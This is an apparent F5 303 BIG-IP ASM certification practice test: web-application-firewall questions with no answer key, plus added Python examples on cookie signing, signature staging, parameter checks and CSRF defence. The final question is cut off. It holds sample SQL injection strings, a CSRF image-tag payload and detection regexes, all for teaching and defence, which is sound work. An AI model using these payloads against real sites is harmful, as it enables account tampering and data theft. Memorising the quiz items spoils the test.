
Test title:
F5 303

Description:
test 303

Author:
Gaoul

Creation date: 22/10/2024

Category: Computing

Number of questions: 102
Questions:

An ASM Specialist needs to log violations for unauthenticated users who try to access restricted resources. What must be configured?
a) enable the Alarm flag for Login URL Bypassed in Learning and Blocking Settings
b) configure Brute Force Attack Prevention
c) create a Disallowed URL in the URLs list
d) enable the Alarm flag for Illegal URL in Learning and Blocking Settings

An organization uses the BIG-IP ASM module. The organization is concerned about DoS attacks and wants to use a policy feature that can help with automatic mitigation based on back-end server performance. Which ASM DoS profile feature should the ASM Specialist implement?
a) Stress-based DoS Detection
b) TPS-based DoS Detection
c) Heavy URL Protection
d) Bot Signature Lists

An ASM Specialist exports an ASM policy in XML format with the "compact format" option. What is the result?
a) ASM generates a file in a binary format
b) ASM discards any WSDL previously uploaded to the XML content profiles
c) ASM uses the gzip format to reduce the size of the exported policy
d) ASM does not include the staging state for signatures

An ASM Specialist is deploying ASM for a custom application. The specialist needs to use known good traffic from QA employees to build the security policy in the least time possible. How should the ASM Specialist create the policy?
a) with an F5 application template, and add the QA addresses to the IP Addresses Whitelist
b) automatically, and add the QA addresses to the IP Address Exceptions list
c) automatically, and add the QA addresses to the Trusted IP Addresses list
d) manually, and add the QA addresses to the IP Address Exceptions list

An ASM Specialist needs to configure a login page based on the following form. What are the correct settings for the login page?
a) Login URL: Explicit HTTP /welcome.php; Expected HTTP response status code: 200
b) Login URL: Explicit HTTPS /login.php; Expected HTTP response status code: 302
c) Login URL: Explicit HTTPS /welcome.php; Expected HTTP response status code: 200
d) Login URL: Explicit HTTP /login.php; Expected HTTP response status code: 302

While reviewing the ASM policy status, an ASM Specialist discovers URLs that contain %APPDATA%. Which type of common attack does this represent?
a) Command Execution
b) Predictable Resource Location
c) Content Spoofing
d) Format String Attack

Review the following request. An ASM Specialist is modifying a security policy and must allow the web request shown through the ASM to a critical application. How should the ASM Specialist meet this request and still support the security objectives?
a) permit the Trident 5.0 User-Agent
b) modify the allowed meta characters
c) validate headers for HTTP 1.1
d) disable XSS signatures

Users experience trouble logging into their accounts. The email addresses of some user accounts have all been changed to the same address. Which ASM module feature should be configured to protect against such attacks?
a) Redirection Protection
b) Session Tracking
c) CSRF Protection
d) Bot Detection

An ASM Specialist is deploying a web application that uses SharePoint. The web application is experiencing a system outage caused by a common web vulnerability. Which deployment method should the ASM Specialist use to quickly mitigate the attack?
a) manual policy
b) rapid deployment security policy
c) policy based on a third-party vulnerability assessment
d) automatic policy

An organization is deploying an AJAX application that uses XML for data transfer. The ASM Specialist needs to keep the number of false positives to a minimum. It is a requirement that the security policy begin blocking automatically once ASM has learned the application traffic. Which deployment policy should the ASM Specialist use to accommodate these requirements?
a) Third-Party vulnerability testing tool
b) Real Traffic Policy Builder, keeping signatures in staging
c) Application Template in Rapid Deployment Manager
d) Rapid Deployment Manager

An ASM Specialist enables Data Guard to prevent credit card numbers from being exposed in several legacy applications. Users report that it takes too long to download files through these applications. Which Data Guard configuration change should the ASM Specialist make to resolve the issue?
a) create custom patterns that match credit card numbers only
b) configure an Ignored URLs list for approved documents
c) disable Mask Data
d) enable exception patterns for Word and PDF documents

An ASM Specialist finds that bots are continuously making username and password attempts against the login page of an organization's web application. What is a potential effect on the web application?
a) randomly locked accounts
b) reduced application latency
c) reduced memory utilization of the application
d) application server reboot

An ASM Specialist sets up a new ASM security policy in Blocking mode with all Attack Signatures set to Learn and Alarm. A request matching an Attack Signature is received. What happens to the request?
a) Illegal requests are NOT logged, learning is unavailable and they are NOT blocked
b) Illegal requests are logged, learning is available and they are NOT blocked
c) Illegal requests are logged, learning is unavailable and they are blocked
d) Illegal requests are NOT logged, learning is available and they are blocked

An e-commerce website sets a cookie on the client machine specifying that the user is eligible for a 25% discount on the user's next visit. The user maliciously changes the content of this cookie to specify that they are eligible for a 100% discount on their next visit. How should an ASM Specialist adjust the configuration to protect the website while the ASM module is in Blocking mode?
a) make sure that the "Block" checkbox for "ASM Cookie Hijacking" is checked
b) add the cookie to the "Enforced Cookies" list
c) check the "Block" checkbox for "Cookie not RFC-compliant"
d) add the cookie to the "Allowed Cookies" list

An ASM Specialist is deploying a new application security policy using the automatic policy building option and needs to learn explicit parameters at the URL level. Which policy type within the automatic policy builder should the ASM Specialist use?
a) Enhanced
b) Advanced
c) Fundamental
d) Comprehensive

An organization has a legacy web shop running. The ASM Specialist needs to provide a baseline ASM security policy for this web shop. The operating system is Linux, the web server is Apache and Tomcat runs the web shop. What is the most efficient deployment method to establish an Attack Signature-based policy?
a) manually, for XML and web services
b) using the Automatic Policy Builder
c) manually, with the Rapid Deployment security policy
d) using the output of a third-party vulnerability assessment tool

Which setting should an ASM Specialist configure on an ASM module before WhiteHat Sentinel scanner vulnerabilities can be imported?
a) WhiteHat Sentinel Vulnerability UI
b) WhiteHat Web API key
c) WhiteHat Scanner Integration
d) WhiteHat Scanner Assessment Tool

A user needs to do the following:
- modify security policies
- review HTTP, FTP and SMTP profiles on the LTM+ASM device
- have no access to, or ability to modify, any other LTM or TMOS objects
Which user role should be assigned to meet these requirements?
a) Application Security Editor
b) Application Security Administrator
c) Firewall Manager
d) Administrator

An ASM Specialist recently modified the ASM configuration to respond to an ongoing DoS attack on the protected website. The ASM policy for the website is in Blocking mode. The Stress-based DoS Detection settings are as follows:
- Blocking
- Detection by Source IP
- Mitigation by Client Side Integrity Defense
- Standard Protection in Behavioral settings
Which method should the ASM Specialist use to determine whether the attack has been successfully mitigated?
a) review the Historical and Recent Attacks log and look for the flag of an attack in progress
b) check the Dashboard to make sure that the CPU and memory usage on the web server have returned to normal pre-attack levels
c) look for Client Side Integrity Defense log entries on the website servers to verify that protection is in place
d) make sure that Bot Signature Checking is working by verifying that Googlebot or other friendly bots can reach the website

Which option should an ASM Specialist configure in the policy to mitigate the potential attacks in the request?
a) create the cookie "security" as an Enforced Cookie
b) enable the HTTP Protocol Compliance Failed violation
c) add the header Upgrade-Insecure-Requests to the policy
d) apply the Generic Detection Signatures set

After a penetration test, an application developer wants the ASM Specialist to set the HttpOnly attribute on the PHP_SESSION cookie. The developer needs to know the impact of this change. What information should the ASM Specialist provide to the developer?
a) A new virtual server running on port 80 will be required to maintain functionality
b) The PHP_SESSION cookie must be added to Enforced Cookies to maintain functionality
c) The PHP_SESSION cookie will NOT be sent over non-encrypted paths
d) The PHP_SESSION cookie will NOT be accessible to browser scripts

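Two cookie protections come up in the questions above: the discount cookie the user rewrites from 25 to 100, and the HttpOnly attribute requested for PHP_SESSION. The following Python is an added example, not code from this page or from F5. It shows the general technique that makes a client-side cookie tamper-evident (an HMAC tag bound to the cookie name and value, so a value changed on the client no longer verifies, which is the effect an enforced cookie has in ASM) and a helper that appends HttpOnly to a Set-Cookie header for a named cookie without touching its other attributes. The key, cookie names and values are constructed for the example; ASM's own domain-cookie signing is not reproduced.

```python
import hashlib
import hmac
from typing import Optional, Tuple

# Constructed demo key; a real deployment keeps this out of source and rotates it.
SERVER_KEY = b"constructed-demo-key-not-for-production"

def sign_cookie(name: str, value: str, key: bytes = SERVER_KEY) -> str:
    """Return '<value>.<tag>' where tag = HMAC(key, name=value), truncated to 128 bits."""
    tag = hmac.new(key, f"{name}={value}".encode(), hashlib.sha256).hexdigest()[:32]
    return f"{value}.{tag}"

def verify_cookie(name: str, signed: str, key: bytes = SERVER_KEY) -> Tuple[bool, Optional[str]]:
    """Return (valid, value). Unsigned or tampered values fail closed."""
    value, sep, tag = signed.rpartition(".")
    if not sep:
        return False, None
    expected = hmac.new(key, f"{name}={value}".encode(), hashlib.sha256).hexdigest()[:32]
    if hmac.compare_digest(tag, expected):
        return True, value
    return False, None

def harden_set_cookie(header: str, cookie_name: str) -> str:
    """Append HttpOnly to a Set-Cookie header for cookie_name if it is missing.
    Other attributes (Path, Secure, SameSite, ...) are left exactly as they were."""
    parts = [p.strip() for p in header.split(";")]
    name = parts[0].split("=", 1)[0]
    if name != cookie_name:
        return header
    if any(p.lower() == "httponly" for p in parts[1:]):
        return header
    return header.rstrip("; ") + "; HttpOnly"

if __name__ == "__main__":
    # The discount cookie as the server issues it, then as the user rewrote it.
    issued = sign_cookie("discount", "25")
    tampered = "100." + issued.split(".", 1)[1]
    print("issued  :", issued, verify_cookie("discount", issued))
    print("tampered:", tampered, verify_cookie("discount", tampered))
    # HttpOnly keeps the cookie usable by the browser but invisible to document.cookie.
    print(harden_set_cookie("PHP_SESSION=abc123; Path=/", "PHP_SESSION"))
```

Note that HttpOnly changes nothing about how the browser sends the cookie, so no functional change is needed on the application side; it is the Secure attribute, not HttpOnly, that stops the cookie from travelling over unencrypted paths.
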
An organization configured ASM with TPS-based Detection in Blocking mode. The organization discovered that TPS-based Detection is blocking its upstream content-caching servers. An ASM Specialist needs to allow the content-caching servers to access the web application without weakening TPS-based Detection protection. Which TPS-based Detection profile change should the ASM Specialist make?
a) configure the IP addresses of the content-caching servers in the IP Address Whitelist
b) set the Prevention Duration for TPS-based Detection to a maximum of 300 seconds
c) increase "TPS reached" in the IP Detection Criteria to the rate of the content-caching servers
d) enable URL-based Client-Side Integrity Defense for the landing URL of the protected website

Based on existing attack patterns, an ASM administrator recently implemented significant changes to the deployed policy. A reliable method is needed to evaluate the effect of the policy adjustments, and an easy way to aggregate and interpret the data is required to simplify the evaluation. What should be reviewed?
a) the ASM Request Log
b) the Event Correlation data
c) the entries present in /var/log/asm
d) DoS Application Events

An ASM Specialist implements a new Attack Signature to prevent an XSS attack. How should the ASM Specialist establish that the vulnerability is mitigated?
a)
   1. Configure Security >> Application Security >> IP Addresses >> IP Address Intelligence >> New IP Address with an exception for a vulnerability scanner and verify the attack is successful
   2. Remove the application security from the IP Address Intelligence list, repeat the attack and verify the attack has been mitigated
   3. Access the application security Brute Force Attacks log and verify the attack has been logged correctly
b)
   1. Configure Security >> Application Security >> IP Addresses >> IP Address Exceptions >> New IP Address Exception with an exception for a vulnerability scanner and verify the attack is successful
   2. Remove the scanner address from the IP Address Exceptions list, repeat the attack and verify the attack has been mitigated
   3. Access the application security Brute Force Attacks log and verify the attack has been logged correctly
c)
   1. Configure Security >> Application Security >> IP Addresses >> IP Address Exceptions >> New IP Address Exception with an exception for a vulnerability scanner and verify the attack is successful
   2. Remove the scanner address from the IP Address Exceptions list, repeat the attack and verify the attack has been mitigated
   3. Access the application security Requests log and verify the attack has been logged correctly
d)
   1. Configure Security >> Application Security >> IP Addresses >> IP Address Intelligence >> New IP Address Exception with an exception for a vulnerability scanner and verify the attack is successful
   2. Remove the scanner address from the IP Address Intelligence list, repeat the attack and verify the attack has been mitigated
   3. Access the application security Requests log and verify the attack has been logged correctly

An organization has an active/standby cluster of two BIG-IP devices that run the LTM and ASM modules and are in a Device Group; BIG-IP-1 is Active and the other device is Standby. The organization's Internet-facing application is protected by an ASM policy in Blocking enforcement mode. The standby device becomes Active after a system upgrade. The ASM Specialist receives a report that several attack types are no longer being blocked. Which next step should the ASM Specialist take to make sure the ASM policy functions correctly?
a) update the ASM attack signatures
b) configure Application Security Synchronization
c) update the IP Intelligence database
d) configure Web Scraping protection

An ASM Specialist has been assigned to work with a new Security Engineer. The ASM Specialist needs to create an account for the new engineer that allows the creation and modification of new and existing ASM policies and their assignment to virtual servers. Which role should the ASM Specialist assign to the engineer to meet the minimum requirements?
a) Administrator
b) Application Editor
c) Application Security Administrator
d) Application Security Editor

A request is blocked due to the HTTP Request Smuggling attack type. Which violation triggered this event?
a) POST request with Content-Length: 0
b) Body in GET or HEAD requests
c) Header name with no header value
d) Bad multipart/form-data request parsing

Which vulnerability can an ASM module automatically resolve by importing a generic vulnerability scanning results XML file?
a) Path Traversal
b) Session Hijacking
c) Cookie Manipulation
d) Unvalidated Redirects and Forwards

An ASM Specialist needs to force a browser to authenticate before accessing a list of resources. The default session lifetime must be overridden with a shorter value. Which two settings should the ASM Specialist enable and configure? (Choose two)
a) Cookie List
b) URL Wildcard Order
c) Login Enforcement
d) Mandatory Header
e) Login Pages List

An ASM Specialist is creating a new policy in the Deployment Wizard. When should the ASM Specialist check the "Security Policy is case sensitive" option?
a) when the application server and the language are case sensitive
b) when the stored security elements are lower case
c) when the attack signatures must be case sensitive
d) when the application language is Unicode (UTF-8)

Which action should an ASM Specialist take to see all of the requests when the security policy is in Transparent mode?
a) configure HTTP Protocol Compliance
b) set the enforcement to Alarm
c) configure the Logging Profile
d) set the enforcement mode to Blocking

Users can access the information page, phpinfo.php, of a PHP web application protected by an ASM policy in Blocking mode. Access to this page must be restricted immediately without disrupting traffic. What should the ASM Specialist do to fix this problem?
a) add phpinfo.php to the Disallowed File Types
b) add /phpinfo.php to the Disallowed URLs
c) add php to the Disallowed File Types
d) add *.php to the Disallowed URLs

A Requests log shows that the "xmlPayload" parameter value is a base64 string of encoded XML content. An ASM Specialist decodes the base64 string and identifies illegal meta characters that should be allowed. How should the ASM Specialist create the xmlPayload parameter?
a) override the wildcard entity with base64 meta characters
b) create an explicit parameter with the XML Parameter Value type, using regular expressions, and override the meta characters
c) create an explicit parameter with the User-input Parameter Value type, with the base64 decoding option enabled, and override the meta characters
d) change the default Character Sets policy to allow base64 content

A review of web application logs shows failed logins with unexpected usernames such as "OR 'A' =CHR(65)". Which ASM feature should an ASM Specialist use to protect against this type of malicious behavior?
a) Attack Signatures
b) Plain Text Profiles
c) Web Scraping
d) Login Enforcement

An organization needs to gather statistics on the amount of traffic received from specific countries. The ASM policy enforcement mode is set to Transparent. The ASM Specialist adds the specified countries to the Disallowed Geolocations to gather the information; the Access from Disallowed Geolocations violation uses the default settings. What happens to requests from countries added to the Disallowed Geolocations when the enforcement mode is changed to Blocking?
a) Requests are logged as illegal and allowed
b) Requests are logged as illegal and blocked
c) Requests are blocked
d) Requests are allowed

Which learning suggestion should be generated by the request shown?
a) Attack Signature Detected - JavaScript buffer overflow attempt
b) Attack Signature Detected - XPath injection Script
c) Attack Signature Detected - Cross-Site Request Forgery (CSRF)
d) Attack Signature Detected - Cross-Site Scripting (XSS)

An ASM Specialist updates the ASM Signatures Database. After 5 days, the ASM Specialist gets an escalation from the Security Operations Center: a specific SQL Injection pattern is bypassing the ASM policy. The ASM policy is successfully mitigating other malicious traffic, including other SQL Injections; only the reported SQL Injection pattern is bypassing the policy. The ASM policy event log shows that the reported attack pattern is being detected but NOT blocked. What is causing this problem?
a) The attack pattern matches an outdated SQL Injection signature
b) The attack pattern matches the SQL Injection signature that has the lowest "Violation Rating"
c) The attack pattern matches the SQL Injection signature that does NOT have any parameter in the request
d) The attack pattern matches the newly updated SQL Injection signature, which is in staging

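The questions on the Learn/Alarm/Block flags, on the username "OR 'A' =CHR(65)" and on the signature that is detected but not blocked all turn on one decision: a request is logged when the violation's Alarm flag is set, produces a learning suggestion when Learn is set, and is blocked only when Block is set, the policy is in Blocking mode and at least one matching signature is not in staging. The following Python is an added example, not F5 code. It models that logic with two constructed, simplified regex patterns standing in for attack signatures (ASM's real signature syntax and the Violation Rating are not modeled) and evaluates sample login values against a fully enforcing policy and a Learn/Alarm-only one.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

@dataclass(frozen=True)
class Signature:
    name: str
    pattern: str          # constructed regex stand-in for an ASM attack signature
    staged: bool = False  # a staged signature is reported but never enforced

@dataclass(frozen=True)
class ViolationSettings:
    learn: bool
    alarm: bool
    block: bool

@dataclass(frozen=True)
class Policy:
    enforcement_mode: str                        # "transparent" or "blocking"
    attack_signature_detected: ViolationSettings # flags for this one violation
    signatures: List[Signature]

# Constructed signatures: the first is established, the second is "newly
# updated" and still inside its staging period.
SIGNATURES = [
    Signature("SQL-INJ boolean expression (OR 'x'=)", r"(?i)\bor\s+'[^']*'\s*="),
    Signature("SQL-INJ CHR() function (newly updated)", r"(?i)\bchr\s*\(\s*\d+\s*\)",
              staged=True),
]

def decide(policy: Policy, value: str) -> Dict[str, object]:
    """Return what the policy does with a parameter value."""
    matched = [s for s in policy.signatures if re.search(s.pattern, value)]
    enforceable = [s for s in matched if not s.staged]
    flags = policy.attack_signature_detected
    detected = bool(matched)
    return {
        "matches": [s.name for s in matched],
        "logged": detected and flags.alarm,
        "learning": detected and flags.learn,
        "blocked": (bool(enforceable) and flags.block
                    and policy.enforcement_mode == "blocking"),
    }

if __name__ == "__main__":
    full = Policy("blocking", ViolationSettings(True, True, True), SIGNATURES)
    learn_only = Policy("blocking", ViolationSettings(True, True, False), SIGNATURES)
    # Constructed login values: benign, the pattern from the logs, and one that
    # hits only the staged signature (the "detected but not blocked" case).
    samples = ["alice", "OR 'A' =CHR(65)", "admin' AND CHR(65)=CHR(65)"]
    for label, pol in (("full", full), ("learn_only", learn_only)):
        for v in samples:
            print(f"{label:10} {v!r:32} {decide(pol, v)}")
```

The third sample is the escalation scenario: it is logged (so the SOC sees it in the event log) yet never blocked, because its only match is a staged signature; enforcing that signature, not lowering a rating or adding parameters, is what changes the outcome.
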
An organization's website tracks a user by including the user account number as an unprotected HTML form parameter. How should an ASM Specialist protect against this threat?
a) add the parameter as a dynamic parameter with proper extraction
b) enable Data Guard with a custom pattern to protect the parameter
c) configure Proactive Bot Detection to prevent parameter tampering
d) enforce flows to the URL that serves the HTML form and the parameter

An ASM Specialist needs to make sure that only .png, .jpg and .gif file types can be downloaded from a corporate portal. The corporate portal uses a Content Management System that generates a special download form. The following is an excerpt from the form delivered by the application prior to the file download request. Which set of configuration steps should an ASM Specialist complete to meet this requirement?
a) 1. Add the ".png", ".jpg" and ".gif" file types to the allowed file types. 2. Create the explicit parameter "fsel".
b) 1. Create the explicit parameter "fsel". 2. Configure an appropriate regular expression for the "fsel" parameter.
c) 1. Add the ".png", ".jpg" and ".gif" file types to the allowed file types. 2. Remove the wildcard file type from the allowed file types.
d) 1. Add the ".png", ".jpg" and ".gif" file types to the allowed file types. 2. Configure an appropriate regular expression for the allowed file types.

An organization is deploying a QA environment for testing a new Web 2.0 application and needs it protected by a security policy. Network Engineering wants the ability to easily and quickly define trusted IP addresses. The application developers require JSON/XML payload detection. The security engineers have requested that these requirements be defined during the creation of the policy. Which deployment method will satisfy these requirements?
a) Third-Party Vulnerability
b) Rapid Deployment
c) Policy Builder
d) Manual

Which option should an ASM Specialist configure in the ASM security policy to mitigate this type of attack?
a) apply the Generic Detection Signatures set
b) configure aspx as a Disallowed File Type
c) configure price as a Sensitive Parameter
d) enable Web Scraping

Refer to the exhibit. Which attack is shown in the exhibit?
a) SQL Injection
b) Cross-Site Scripting
c) Cross-Site Request Forgery
d) XML Entity Attack

An ASM Specialist is creating an iRule that fires on the ASM_REQUEST_VIOLATION event in order to capture specific application-related information (such as the user ID and the Java session ID). However, the ASM Specialist did NOT find any entries while inspecting the logs. Which action should the ASM Specialist take in order for the logs to be updated?
a) enable sensitive parameters
b) take the ASM policy out of Transparent mode
c) apply the iRule to the ASM policy
d) enable Trigger ASM iRule Events

Which option should an ASM Specialist enable in the policy to mitigate the potential attacks present in the request?
a) Evasion Technique Detected violation
b) Illegal Empty Parameter Value violation
c) Illegal Repeated Parameter Name violation
d) Generic Detection Signatures

Refer to the exhibit. An organization's security policy indicates that:
1. "." (dot) is allowed in the "password" parameter
2. "-" (dash) is disallowed in the "login" parameter
The wildcard parameter has NO meta character overridden and is the only entity declared. Which setting should the ASM Specialist modify?
a) the global policy Character Set for Parameter Value: allow "." (dot)
b) the wildcard parameter's Value Meta Characters: disallow "-" (dash)
c) the newly created parameter "password" Value Meta Characters: allow "." (dot)
d) the newly created parameter "login" Value Meta Characters: disallow "-" (dash)

Which option should an ASM Specialist enable in the Learning and Blocking Settings to mitigate the potential attacks present in the request?
a) Null in Request
b) Redirection Protection
c) Failed to Convert Character
d) Cross-Site Request Forgery Protection

An ASM Specialist is reviewing a security audit report and discovers that a SQL Injection pattern reached the application server while the security policy was in Blocking mode. Which two settings should the ASM Specialist check to determine the cause of this issue? (Choose two)
a) Illegal parameter
b) Anomaly detection
c) Check parameter value
d) Brute Force attack prevention
e) Meta-character in value

An ASM Specialist needs to use Policy Diff to compare security policies. Which three user roles allow the ASM Specialist to perform this task?
a) Manager, Application Security Administrator, Resource Administrator
b) Operator, Application Security Editor, Administrator
c) Administrator, Application Security Administrator, Application Security Editor
d) Resource Administrator, Application Security Administrator, Application Editor

A customer is preparing an online retail site to sell a new product. The customer expects an unusually high number of client requests. The retail web application is protected by an ASM policy in Blocking mode. The top priority is to keep the ASM module from becoming the limiting factor for application performance. Which change should the ASM Specialist make to the ASM configuration to meet the customer's requirements?
a) configure ASM bypass
b) configure the ASM policy in Transparent mode
c) take attack signatures out of staging
d) enable DDoS protection

A web auction site allows users to post images that other users can view. The site has a Cross-Site Request Forgery vulnerability. How does this vulnerability potentially affect application security?
a) A user who views the post can bid on an item without the user's knowledge
b) An attacker can compromise the site's credit card database
c) An attacker can finalize a successful bid for delivery without paying for the item
d) An attacker can capture the user's username and password

An ASM Specialist finds the following violation in the Manual Traffic Learning section of ASM under Attack Signature Detected: "XSS script tag end (Parameter)". Which two options should the ASM Specialist find as suggestions in the Action column for this violation? (Choose two)
a) Disable on URL
b) Accept All
c) Disable on parameter
d) Accept
e) Disable

The messages started to appear 8 hours ago. query_items.aspx consumes considerable server resources and involves complex database queries. This URL experiences high latency when accessed by users. Which option should an ASM Specialist configure in the ASM policy to mitigate this type of attack?
a) enable Web Scraping
b) apply Generic Detection Signatures
c) enable Brute Force Attack Prevention
d) enable a DoS Protection profile

Review the following request. Which option should an ASM Specialist enable in the Learning and Blocking Settings to mitigate the potential attacks in the request?
a) Bad Unescape
b) Multiple Decoding
c) Unparsable Request Content
d) Null in Request

An ASM Specialist has a requirement to restrict queries to a nine-digit product code. An explicit parameter named q is configured with the following specifications:
- Data Type: Decimal
- Minimum Value: Any
- Maximum Value: Any
- Maximum Length: 9
The ASM policy Blocking Settings have the Illegal Parameter Value Length violation set to Learn, Alarm and Block. Which HTTP request should the ASM Specialist use to test a failed request?
a) GET /search=12345678910 HTTP/1.0
b) GET /search.php?q=123456789 HTTP/1.0
c) POST /q=123456 HTTP/1.0
d) GET /search.php?q=12345678910 HTTP/1.0

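The xmlPayload, password/login meta-character and nine-digit product-code questions are all parameter-value checks that ASM applies per explicit parameter, with the wildcard parameter catching everything else. The following Python is an added example, not F5 code. It models those checks (base64 decoding before inspection, a Decimal data type, a maximum length and a per-parameter set of disallowed meta characters) and runs the four candidate requests from the product-code question through them, so it is visible which one actually exercises the length violation and why the others never reach parameter q at all. The default disallowed set and the policy entries are constructed for the example, request bodies are not parsed, and ASM's real character-set defaults may differ.

```python
import base64
import binascii
from dataclasses import dataclass
from typing import FrozenSet, List, Optional
from urllib.parse import parse_qsl, urlsplit

# Constructed stand-in for the policy's default character set for parameter
# values: these meta characters are disallowed unless an explicit parameter
# overrides the set.
DEFAULT_DISALLOWED_META: FrozenSet[str] = frozenset('<>"\'.')

@dataclass(frozen=True)
class ParamSpec:
    name: str
    value_type: str = "user-input"          # "user-input" or "decimal"
    max_length: Optional[int] = None
    base64_decode: bool = False             # decode before any other check
    disallowed_meta: FrozenSet[str] = DEFAULT_DISALLOWED_META

# Explicit parameters from the questions; anything else hits the wildcard '*'.
POLICY = {
    "q": ParamSpec("q", value_type="decimal", max_length=9),
    "xmlPayload": ParamSpec("xmlPayload", base64_decode=True, disallowed_meta=frozenset()),
    "password": ParamSpec("password", disallowed_meta=DEFAULT_DISALLOWED_META - {"."}),
    "login": ParamSpec("login", disallowed_meta=DEFAULT_DISALLOWED_META | {"-"}),
}
WILDCARD = ParamSpec("*")

def check_param(name: str, raw: str) -> List[str]:
    """Return the violations one parameter value raises under the policy."""
    spec = POLICY.get(name, WILDCARD)
    value = raw
    if spec.base64_decode:
        try:
            value = base64.b64decode(raw, validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            return [f"Illegal base64 value: {name}"]
    violations = []
    if spec.value_type == "decimal" and not value.isdigit():
        violations.append(f"Illegal parameter data type: {name}")
    if spec.max_length is not None and len(value) > spec.max_length:
        violations.append(f"Illegal parameter value length: {name}")
    bad = sorted({c for c in value if c in spec.disallowed_meta})
    if bad:
        violations.append(f"Illegal meta character in parameter value: {name} {''.join(bad)}")
    return violations

def check_request(request_line: str) -> List[str]:
    """Check every query-string parameter of 'METHOD /target HTTP/x'."""
    _method, target, _version = request_line.split()
    violations = []
    for name, raw in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        violations.extend(check_param(name, raw))
    return violations

if __name__ == "__main__":
    for line in ("GET /search=12345678910 HTTP/1.0",
                 "GET /search.php?q=123456789 HTTP/1.0",
                 "POST /q=123456 HTTP/1.0",
                 "GET /search.php?q=12345678910 HTTP/1.0"):
        print(f"{line:45} {check_request(line)}")
    # "PGE+MTwvYT4=" is base64 for "<a>1</a>": legal once decoded for xmlPayload,
    # while the same markup in a wildcard parameter trips the meta-character check.
    print(check_param("xmlPayload", "PGE+MTwvYT4="), check_param("comment", "<a>"))
```

Only the last request line carries a value for q that is longer than nine characters; the first and third put the digits in the path, where no parameter check applies, and the second is exactly nine digits and passes.
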
A legitimate user visits a site while authenticated to the corporate application. The site has changed personal data on the corporate application using the following HTML tag:
<img src="https://corporateapp/myprofile?email=tedyi****@mail.com">
What should an ASM Specialist configure to mitigate such an attack?
a) CSRF Protection
b) Login Enforcement
c) Redirection Protection
d) Proactive Bot Defense

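The auction-site question and the <img src> tag above describe the same flaw: the browser attaches the victim's session cookie to a request the victim never intended, so a GET embedded in an image tag on another site changes the profile. The following Python is an added example, not F5 code and not the application's code: a vulnerable handler that trusts any request carrying the session sits beside a hardened one that refuses state changes over GET, checks that the Origin or Referer host is the application's own, and requires a per-session token that a page on another origin cannot read. The host name is the one from the tag above; the key, session IDs and addresses are constructed. ASM's CSRF Protection feature does this at the WAF instead of in application code, so the block shows the principle rather than the product's implementation.

```python
import hashlib
import hmac
from typing import Dict, Tuple

from urllib.parse import urlsplit

APP_HOST = "corporateapp"              # host from the <img src> in the question
SERVER_KEY = b"constructed-demo-key"   # constructed; keep real keys out of source

def csrf_token_for(session_id: str, key: bytes = SERVER_KEY) -> str:
    """Per-session token, embedded in the application's own forms, never in a cookie."""
    return hmac.new(key, session_id.encode(), hashlib.sha256).hexdigest()

def csrf_check(method: str, headers: Dict[str, str], params: Dict[str, str],
               session_id: str) -> Tuple[bool, str]:
    """Accept a state-changing request only when it is demonstrably first-party."""
    if method.upper() in ("GET", "HEAD", "OPTIONS"):
        return False, "state change over a safe method is refused"
    source = headers.get("Origin") or headers.get("Referer")
    if not source or urlsplit(source).hostname != APP_HOST:
        return False, "Origin/Referer host does not match the application"
    if not hmac.compare_digest(params.get("csrf_token", ""), csrf_token_for(session_id)):
        return False, "missing or wrong CSRF token"
    return True, "ok"

def vulnerable_update_email(profiles: Dict[str, str], session_id: str, method: str,
                            headers: Dict[str, str], params: Dict[str, str]) -> bool:
    """Trusts the session cookie alone: the image-tag request from another site succeeds."""
    if session_id in profiles and "email" in params:
        profiles[session_id] = params["email"]
        return True
    return False

def hardened_update_email(profiles: Dict[str, str], session_id: str, method: str,
                          headers: Dict[str, str], params: Dict[str, str]) -> Tuple[bool, str]:
    ok, reason = csrf_check(method, headers, params, session_id)
    if not ok:
        return False, reason
    if session_id not in profiles or "email" not in params:
        return False, "unknown session or no email supplied"
    profiles[session_id] = params["email"]
    return True, "updated"

if __name__ == "__main__":
    # Constructed: what the browser sends when it loads the attacker's <img>.
    attack_headers = {"Referer": "https://evil.example/post/123", "Cookie": "PHPSESSID=s1"}
    attack_params = {"email": "attacker@mail.com"}
    profiles = {"s1": "ted@mail.com"}
    vulnerable_update_email(profiles, "s1", "GET", attack_headers, attack_params)
    print("vulnerable:", profiles)
    profiles = {"s1": "ted@mail.com"}
    print("hardened  :", hardened_update_email(profiles, "s1", "GET", attack_headers, attack_params), profiles)
```

The hardened handler fails closed on any one of the three checks; a correct token presented from a foreign origin, or a first-party request without the token, is refused just like the image-tag GET.
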
An organization recently launched a web store selling music downloads, which is protected by an ASM security policy. Some partner resellers report that their web crawlers are being blocked. How should this issue be resolved?
a) disable the Attack Signatures with Signature Scope JSON
b) set the Attack Signatures for Unix/Linux to Staging
c) set the Attack Signatures for System Independent to Staging
d) disable the Attack Signatures with Attack Type Non-browser Client

An ASM Specialist tries to determine the username used in an attack. The ASM Specialist notices the following log entry on the ASM. Which specific configuration change should the ASM Specialist make to ensure that the username is logged?
a) remove username from the Sensitive Parameters list
b) create a logging policy that logs all requests
c) configure and enable Login Enforcement
d) change the username parameter settings so that username is logged

An ASM Specialist adds a wildcard parameter to a security policy and re-selects the "Check attack signatures on this parameter" box. Which unintended positive-security vulnerability might this action introduce?
a) remote file include
b) web scraping
c) path traversal
d) forceful browsing

Which ASM function generates this violation?
a) HTTP protocol compliance failed
b) Mandatory HTTP header is missing
c) Attack signature detected
d) Illegal meta character in URL

An ASM Specialist makes changes to a security policy to mitigate a potential vulnerability in the code. Those changes are shown in the audit log in the exhibit. Which negative-security vulnerability is the username parameter now vulnerable to?
a) SQL Injection
b) Abuse of Functionality
c) Forceful Browsing
d) HTTP Parser Attack

An organization is experiencing an increase in Layer 7 attacks against its file-sharing web application, including the use of malware. The organization has an ICAP antivirus server that can examine files for malware. The ASM Specialist needs to block malicious files, and the application's performance should NOT be severely slowed by anti-malware protection. Which two ASM policy choices should the ASM Specialist make to meet these requirements? (Choose two)
a) select the "Inspect file uploads within HTTP requests" check box in Anti-Virus Protection
b) select the Learn and Alarm check boxes for the Virus Detected violation on the Blocking Settings page
c) configure an ICAP server in Anti-Virus Protection and check Guarantee Enforcement
d) configure an ICAP server in Anti-Virus Protection and do NOT check Guarantee Enforcement
e) choose Comprehensive mode when building the ASM policy to include Anti-Virus Protection

Which two changes happen to ASM signatures after updating the system-supplied attack signatures? (Choose two)
a) The latest attack signatures are added, and the update provides any revisions to existing attack signatures
